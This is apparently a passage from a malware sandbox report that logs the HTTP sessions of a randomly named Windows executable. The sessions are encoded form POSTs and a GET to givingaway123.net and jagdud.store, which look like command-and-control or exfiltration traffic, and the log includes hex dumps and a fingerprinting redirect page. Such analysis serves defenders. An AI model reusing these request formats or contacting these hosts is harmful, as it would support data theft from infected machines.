                                                                                        Data Raw: 6a 6e 51 58 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 63 54 65 4c 79 4b 4a 41 2b 71 6c 6a 43 48 49 6e 6c 47 66 6f 6a 74 66 4f 41 6e 48 65 2f 50 6d 78 4f 65 62 32 63 62 55 74 66 78 77 4b 78 6e 4e 52 65 76 70 4d 36 53 64 74 46 58 52 39 4f 67 39 79 43 58 53 44 34 77 53 30 31 64 47 42 39 37 33 6b 58 53 53 77 53 46 62 47 39 63 39 4b 4d 43 75 44 42 6f 42 4e 4e 66 78 45 32 6d 6e 38 79 46 33 34 33 4d 42 66 33 31 4b 31 55 43 4c 49 51 53 65 72 46 4a 71 5a 2f 73 35 35 65 68 51 38 52 69 64 6b 74 34 34 39 50 78 64 47 4b 4d 47 34 49 74 7a 46 6e 47 6a 32 34 53 44 66 51 2b 6b 63 30 44 39 31 4c 64 2f 56 6f 69 64 45 68 76 73 78 6d 46 76 53 2f 34 33 4a 36 77 45 4b 4f 73 35 44 64 58 36 63 6f 2f 4e 5a 48 66 54 53 6d 45 6d 2b 32 74 64 34 44 45 31 43 6b 57 38 73 61 52 5a 38 75 66 52 2b 79 78 61 4c 6b 36 62 2f 6e 53 35 7a 64 2f 42 48 4f 31 34 66 6b 57 62 6b 79 6f 6e 4e 56 44 44 79 4d 55 51 75 5a 52 36 56 6c 75 6b 5a 6f 73 36 76 73 38 6c 4a 66 76 6b 42 6a 41 69 65 4e 49 2b 34 66 78 6e 69 48 55 6b 4b 6c 58 58 51 59 66 51 49 4b [TRUNCATED]
                                                                                        Data Ascii: jnQX=ffTojLdnB/BTcTeLyKJA+qljCHInlGfojtfOAnHe/PmxOeb2cbUtfxwKxnNRevpM6SdtFXR9Og9yCXSD4wS01dGB973kXSSwSFbG9c9KMCuDBoBNNfxE2mn8yF343MBf31K1UCLIQSerFJqZ/s55ehQ8Ridkt449PxdGKMG4ItzFnGj24SDfQ+kc0D91Ld/VoidEhvsxmFvS/43J6wEKOs5DdX6co/NZHfTSmEm+2td4DE1CkW8saRZ8ufR+yxaLk6b/nS5zd/BHO14fkWbkyonNVDDyMUQuZR6VlukZos6vs8lJfvkBjAieNI+4fxniHUkKlXXQYfQIKFN/dxK5PNut4hl/udfQUxp4oPrZ2jV3E3RNNaQBns8zmtSyrUc2fblwQcc6LKtBcxDFEv42x/sXuXhh5hT1Z6QmU/BQhJFk+o2BIUM86p1c4dxD4hPsmgltCB7+00rwABkarJMEnp6ZvGdgRgd1N5UbQKcNX9zGlwhaI8VQKUb9l5Hxf48GqhoQrcIpHsMugycch8coGgUe8C43tQt/kyHkMn+/DSyL1kN+jqzCG94CJIoeJ9sgPgeqPgRlra3IhZGjmMEi5Nv/pub23Y1RGL1zigKyF0vMTnujOVdCCCDZr/hLZvIKmNliwqr1+JIyrn5fH7KhAjkLNsqi7MEE3l+J0oKZxBoDFZuFqIXQ7+92xTXJrMINDaS7AKjWmw3wsHyd1beTItHRBOjHyAzk+bvvxjl6btbihDa1G/pB6uO6ldh7VoCKzR28+h6OiWAhxr69dNjWNXGSWslZ3tDWN89auD+XB4TScMEajYGLFmH81kn75DX3/JkBgFCAHCOW6tkfUjiWlYjTtX1s3JUqXvtaXXxnM+W4HxWG59miqR2OrjKTgzr8/IjpjWHRrDKR4mk+umD677LyttFUEhfOgmHKKbbHExtRLE691q+f5BnfAn8+u2NsHMNo+q7Z1jYIIKLgRjwpIuup8xXOVMIIQshL6TjSrE1yAN3 [TRUNCATED]
                                                                                        Oct 9, 2024 12:53:50.244862080 CEST243OUTData Raw: 46 67 52 63 34 41 35 73 78 53 54 6f 66 52 55 6c 64 4c 45 64 53 30 6e 78 48 67 77 53 46 43 6e 38 6b 4b 5a 50 66 35 50 52 47 30 56 42 44 74 51 76 57 4d 43 2f 4b 38 69 6e 2b 54 45 4d 32 33 63 4a 65 34 6a 42 4e 64 6a 73 6c 76 61 4f 41 79 55 4f 68 4c
                                                                                        Data Ascii: FgRc4A5sxSTofRUldLEdS0nxHgwSFCn8kKZPf5PRG0VBDtQvWMC/K8in+TEM23cJe4jBNdjslvaOAyUOhLW4eHuMopo2op634O6mH7eHw91RUjCxZ6lzRzdTnSUOB06922iuRI8sDK6NPQR0lK69jXIbUBgOKRIbF4uPKRXiBUaSkOzSwap5GhXpJn26/WrIFbZsRRRozQ3PaF8bxOTMInRqKdlOTqkdZdau4G9dvggu+FhrBII
                                                                                        Oct 9, 2024 12:53:50.856524944 CEST877INHTTP/1.1 200 OK
                                                                                        date: Wed, 09 Oct 2024 10:53:50 GMT
                                                                                        server: Apache
                                                                                        set-cookie: __tad=1728471230.5861187; expires=Sat, 07-Oct-2034 10:53:50 GMT; Max-Age=315360000
                                                                                        vary: Accept-Encoding
                                                                                        content-encoding: gzip
                                                                                        content-length: 582
                                                                                        content-type: text/html; charset=UTF-8
                                                                                        connection: close
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                        Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.2249194103.224.182.242801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:52.774142981 CEST754OUTPOST /1juc/ HTTP/1.1
                                                                                        Host: www.givingaway123.net
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.givingaway123.net
                                                                                        Referer: http://www.givingaway123.net/1juc/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 63 55 71 4c 7a 59 68 41 2f 4b 6c 6a 57 6e 49 6e 7a 32 66 71 6a 74 62 47 41 6d 54 4f 2f 63 32 78 4f 75 72 32 63 76 30 74 63 78 77 4a 32 58 4e 56 41 66 6f 4f 36 53 63 2b 46 57 74 39 4f 6b 74 79 44 30 71 44 36 78 53 7a 38 4e 47 48 78 62 33 70 58 53 66 62 53 46 57 64 39 64 6c 4b 4d 45 75 44 41 6f 78 4e 66 70 64 45 77 57 6e 2b 6a 56 32 75 33 4d 4d 58 33 31 36 39 55 42 76 49 58 6a 43 72 63 39 6d 5a 31 66 52 35 46 52 51 68 4a 79 63 6d 73 37 49 32 47 69 68 48 44 2f 7a 63 58 63 62 38 76 33 7a 33 33 78 33 4b 55 4e 51 70 71 31 67 44 49 5a 36 64 31 77 3d 3d
                                                                                        Data Ascii: jnQX=ffTojLdnB/BTcUqLzYhA/KljWnInz2fqjtbGAmTO/c2xOur2cv0tcxwJ2XNVAfoO6Sc+FWt9OktyD0qD6xSz8NGHxb3pXSfbSFWd9dlKMEuDAoxNfpdEwWn+jV2u3MMX3169UBvIXjCrc9mZ1fR5FRQhJycms7I2GihHD/zcXcb8v3z33x3KUNQpq1gDIZ6d1w==
                                                                                        Oct 9, 2024 12:53:53.369410992 CEST877INHTTP/1.1 200 OK
                                                                                        date: Wed, 09 Oct 2024 10:53:53 GMT
                                                                                        server: Apache
                                                                                        set-cookie: __tad=1728471233.2398229; expires=Sat, 07-Oct-2034 10:53:53 GMT; Max-Age=315360000
                                                                                        vary: Accept-Encoding
                                                                                        content-encoding: gzip
                                                                                        content-length: 582
                                                                                        content-type: text/html; charset=UTF-8
                                                                                        connection: close
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                        Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.2249195103.224.182.242801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:55.324960947 CEST2472OUTPOST /1juc/ HTTP/1.1
                                                                                        Host: www.givingaway123.net
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.givingaway123.net
                                                                                        Referer: http://www.givingaway123.net/1juc/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 64 30 61 4c 78 2f 56 41 35 71 6c 69 61 48 49 6e 6c 47 66 75 6a 74 66 47 41 6e 48 65 2f 4f 36 78 4f 66 37 32 64 4c 55 74 65 78 77 4a 79 6e 4e 52 65 76 70 4e 36 52 68 48 46 58 64 58 4f 6d 68 79 43 54 47 44 34 7a 36 30 30 64 47 42 69 4c 33 6d 58 53 65 47 53 46 47 52 39 63 52 6b 4d 45 32 44 41 61 70 4e 4c 4a 64 48 38 32 6e 2b 6a 56 32 71 33 4d 4e 4d 33 31 53 6c 55 41 48 59 51 52 71 72 46 5a 71 5a 33 38 35 34 44 52 51 6c 56 69 64 55 74 34 31 62 50 78 63 4e 4b 4d 44 64 49 74 2f 46 6f 30 62 32 34 52 37 63 66 4f 6b 66 72 54 39 31 47 39 2f 54 6f 69 64 49 68 76 73 78 6d 46 37 53 74 59 33 4a 36 78 45 4c 41 4d 35 44 54 33 36 72 6c 66 49 6f 48 66 48 38 6d 48 4f 75 33 61 74 34 43 47 64 43 6a 6d 38 73 57 78 5a 36 75 66 52 6a 34 52 61 68 6b 36 6a 4e 6e 53 6f 73 64 2f 42 48 4f 7a 6b 66 67 41 50 6b 78 34 6e 4e 58 44 44 7a 47 30 51 74 5a 52 75 6a 6c 75 41 5a 6f 74 69 76 32 75 74 4a 5a 73 63 41 6f 51 69 64 4a 49 2b 70 62 78 6d 34 48 55 6f 73 6c 58 50 36 59 62 55 49 4b [TRUNCATED]
                                                                                        Data Ascii: jnQX=ffTojLdnB/BTd0aLx/VA5qliaHInlGfujtfGAnHe/O6xOf72dLUtexwJynNRevpN6RhHFXdXOmhyCTGD4z600dGBiL3mXSeGSFGR9cRkME2DAapNLJdH82n+jV2q3MNM31SlUAHYQRqrFZqZ3854DRQlVidUt41bPxcNKMDdIt/Fo0b24R7cfOkfrT91G9/ToidIhvsxmF7StY3J6xELAM5DT36rlfIoHfH8mHOu3at4CGdCjm8sWxZ6ufRj4Rahk6jNnSosd/BHOzkfgAPkx4nNXDDzG0QtZRujluAZotiv2utJZscAoQidJI+pbxm4HUoslXP6YbUIKHV/fQK5O9uuwBl7/NbEUxhGoMHJ2mF3WT9NOY4G6M89jtS0vUcQfbheQd86L/RBdyLFTIM3m/sQ4nh6sxTpZ60EU8IIh5Vk/Y2BEWk/lJ1Zx9xZuRPymglHCDjA0FTwAAUaofQEnp6aqGdcYARDN5YfQO8dX7fGlARaI+9QN0b9tZH2Ko82qh8qrdhLAcIu5Q0cj/0oAAUY6C42pQtIk0nkMimvDSaL1FN+lPTCOd4ZEooVJ9tTPhP4PghfrcPIhYGjxZoit9vylObygo0vGLssigeUFxTMB3OjInlCNCDhp/hLTPIomN9ywovl+LoyrTdfM7KiNDkMLsqtq8FJ3luJ0oGZxAQDFrGF8r/Qwu9w/zXf+cE9DaidAPD4m2vwuWydlNKQH9GYU+jB2AzM+bvrxiNqad7ihS61BaFOleO98NhSLYCEzRmG+jmeiFkhxqq9deHWNnGSWslW3tDNN8xkuGD6B4TSaIoairuLNGH14Eng9DXp/JwzgGyuHDyW79EfUjiXqIjQ3n1t3JYNXvt0XXNnNM64W3iG5eCiiR2O/zKQuTr9/Ij5jSvBrCKR4WE+6Av94LL3rtEdWhTvgmCZKfDHEC5RLV690a+f+RncLH8rhWBwHMQD+rKB0SIILZDgTiwqB+usjhXfVMMrQs5D6QyvrFtyAt3 [TRUNCATED]
                                                                                        Oct 9, 2024 12:53:55.329926968 CEST1707OUTData Raw: 46 68 51 66 49 4d 59 73 78 54 2f 6f 66 6c 55 6c 5a 76 45 64 51 4d 6e 78 58 67 33 4c 56 43 36 37 6b 4b 65 47 2f 35 4c 52 47 31 6d 42 44 78 32 76 55 67 43 2f 5a 45 69 67 4c 76 45 4d 47 32 56 54 75 34 38 4b 74 51 39 73 6c 6a 65 4f 45 2b 75 4f 78 72
                                                                                        Data Ascii: FhQfIMYsxT/oflUlZvEdQMnxXg3LVC67kKeG/5LRG1mBDx2vUgC/ZEigLvEMG2VTu48KtQ9sljeOE+uOxrW5t/uIbBoyIp77YO3mHH2HwNfRVz7yo2lzhzdXi+XfR00622vuRIUsDS+NNUB0kC69g/IakBnM6ROaF40PKd+iAt5Sk+zSx2p7mRXqJn24/WzU1bAixdeozJYWvdOY0i2A5ujkYIZAzuOdIhq3KCeUcpF06RIvWdi
                                                                                        Oct 9, 2024 12:53:55.969247103 CEST877INHTTP/1.1 200 OK
                                                                                        date: Wed, 09 Oct 2024 10:53:55 GMT
                                                                                        server: Apache
                                                                                        set-cookie: __tad=1728471235.8409754; expires=Sat, 07-Oct-2034 10:53:55 GMT; Max-Age=315360000
                                                                                        vary: Accept-Encoding
                                                                                        content-encoding: gzip
                                                                                        content-length: 582
                                                                                        content-type: text/html; charset=UTF-8
                                                                                        connection: close
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                        Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.2249196103.224.182.242801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:57.855998039 CEST479OUTGET /1juc/?jnQX=Sd7Ig8sUf85GUDOd+69y7q8ASEJkpRiPhIDwYHX4t/HDftDJcaAUQz0Nk1YScc8PwXRpFHVhI0pUMDPk3EzgwMmR193QTxiRUXmZ38pZMEafFZRyFsF28n3zyVCi&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.givingaway123.net
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:53:58.533315897 CEST1236INHTTP/1.1 200 OK
                                                                                        date: Wed, 09 Oct 2024 10:53:58 GMT
                                                                                        server: Apache
                                                                                        set-cookie: __tad=1728471238.8243858; expires=Sat, 07-Oct-2034 10:53:58 GMT; Max-Age=315360000
                                                                                        vary: Accept-Encoding
                                                                                        content-length: 1506
                                                                                        content-type: text/html; charset=UTF-8
                                                                                        connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 67 69 76 69 6e 67 61 77 61 79 31 32 33 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 69 76 69 6e 67 61 77 61 79 31 32 33 2e 6e 65 74 2f 31 6a 75 63 2f 3f 6a 6e 51 58 3d 53 64 37 49 67 38 73 55 66 38 35 47 55 44 4f 64 2b 36 39 79 37 71 38 41 53 45 4a 6b 70 52 69 50 68 49 44 77 59 48 58 34 74 2f 48 44 66 74 44 4a 63 61 41 55 51 7a 30 4e 6b 31 59 53 63 63 38 50 77 58 52 70 46 48 56 68 49 30 70 55 4d 44 50 6b 33 45 7a 67 77 4d 6d 52 31 39 33 51 54 78 69 52 55 58 6d 5a 33 38 70 5a 4d 45 61 66 46 5a 52 79 46 73 46 32 38 6e 33 7a 79 56 43 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>givingaway123.net</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.givingaway123.net/1juc/?jnQX=Sd7Ig8sUf85GUDOd+69y7q8ASEJkpRiPhIDwYHX4t/HDftDJcaAUQz0Nk1YScc8PwXRpFHVhI0pUMDPk3EzgwMmR193QTxiRUXmZ38pZMEafFZRyFsF28n3zyVCi&op9=BLtTm0V&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor
                                                                                        Oct 9, 2024 12:53:58.533339977 CEST542INData Raw: 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 69 76 69 6e 67 61
                                                                                        Data Ascii: ="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.givingaway123.net/1juc/?jnQX=Sd7Ig8sUf85GUDOd+69y7q8ASEJkpRiPhIDwYHX4t/HDftDJcaAUQz0Nk1YScc8PwXRpFHVhI0pUMDPk3EzgwMmR193QTxiRUXmZ38pZMEafFZRyFsF28n3zyVCi&op9=BLtTm0V&fp


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.2249197209.74.64.187801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:03.608346939 CEST2472OUTPOST /qxse/ HTTP/1.1
                                                                                        Host: www.jagdud.store
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.jagdud.store
                                                                                        Referer: http://www.jagdud.store/qxse/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6e 4c 63 50 64 30 78 6e 4b 6f 50 37 5a 51 69 31 4a 70 38 53 34 4c 32 4d 79 41 61 2b 66 36 44 59 56 77 6f 63 44 38 70 73 6d 4d 63 56 56 7a 6b 6f 39 72 45 42 69 39 66 46 56 37 2f 4e 73 53 36 66 48 65 36 68 62 45 74 53 43 50 47 43 36 63 57 75 4c 74 44 4e 38 57 52 47 68 6a 6e 33 75 7a 56 48 76 47 32 63 69 79 70 7a 42 5a 6a 71 37 54 54 59 30 69 53 2f 30 7a 4b 6a 71 4c 37 79 68 75 5a 50 76 33 71 47 6d 34 65 64 62 50 2f 30 69 36 67 6f 72 6b 72 76 53 6e 63 62 66 46 50 36 62 62 55 58 6f 4e 45 4a 34 5a 69 79 32 2f 73 62 31 36 36 31 4f 6d 39 35 6f 6a 49 44 2b 6d 49 50 63 2f 74 78 6a 67 6f 69 77 31 57 4c 63 69 56 56 41 51 62 48 74 30 57 69 67 39 71 78 77 53 56 71 49 47 2b 70 47 2b 31 34 39 64 2b 34 32 64 4d 64 69 51 4e 43 5a 48 64 49 57 2b 74 30 6e 41 71 50 6e 6d 56 74 66 38 68 4f 33 50 72 70 41 6e 53 73 4b 7a 62 50 64 58 74 55 64 73 47 67 6a 69 34 79 67 47 58 63 64 56 38 55 77 76 2f 41 42 44 38 33 4e 77 4f 33 79 4a 46 47 6b 33 44 47 42 6d 2f 63 7a 56 66 51 48 [TRUNCATED]
                                                                                        Data Ascii: jnQX=mrFM9RmSUx+2nLcPd0xnKoP7ZQi1Jp8S4L2MyAa+f6DYVwocD8psmMcVVzko9rEBi9fFV7/NsS6fHe6hbEtSCPGC6cWuLtDN8WRGhjn3uzVHvG2ciypzBZjq7TTY0iS/0zKjqL7yhuZPv3qGm4edbP/0i6gorkrvSncbfFP6bbUXoNEJ4Ziy2/sb1661Om95ojID+mIPc/txjgoiw1WLciVVAQbHt0Wig9qxwSVqIG+pG+149d+42dMdiQNCZHdIW+t0nAqPnmVtf8hO3PrpAnSsKzbPdXtUdsGgji4ygGXcdV8Uwv/ABD83NwO3yJFGk3DGBm/czVfQHenmQkCs+lDNclDoQj8Njcz9d2mPMO0IGpEsSHIkfe6dtkeGtk8Pz2T+NeM0XdUv+T31+WCkSPn9tZd3ptEcfvIDi9fWFCrhGR7BlrKZ1UzHooTbOp0pk4YqxlM3Xf0iZipoZLtAViSp8Dfk+Va1yLqQkS5HKyK1TqY4X3eHAzACaiXv1oghGRdqwXA2+8OIDNg8TE90mjkCsliB1f3lb+7pMEVkendaOzCjm/F6dKk/sn04zzs7wHv9bBmIg4tPiMZ2Edhb83yuqJbFwyvF9szJBnoGinLaonvByaFRMQIc2qakpIlnfZpOQOpnpEv2NsuoItq3c8sN7cyVkovHVY+AeBJzi6lj0X9wF56ycDN1MSx+KbJJHvvJQbB/GocQ/x2WHohGQdrWPXidmy3XC8Wol5f8Tw0MUIshf5YKFsIhSPzn73n/WTjaL8vbN9bnIr2Q5cOeWyWP/q0tQOsbOo+SEILJc+SeK/4cRhNqG+iKSo4vZmIlog5qTB1cEdpUI+74dk478XVFSEckHw1Nyu6e+344fC1j8p+sjFnDrs9O5cyBh5JQcl108TN8SQRFg/Qa2w7asnfZGiYeDhhsSjVG+cYf2EdvyXjDlueVJ3UwKauKDT7+Mu6IjbycZj2HBLUgCSpA5+t/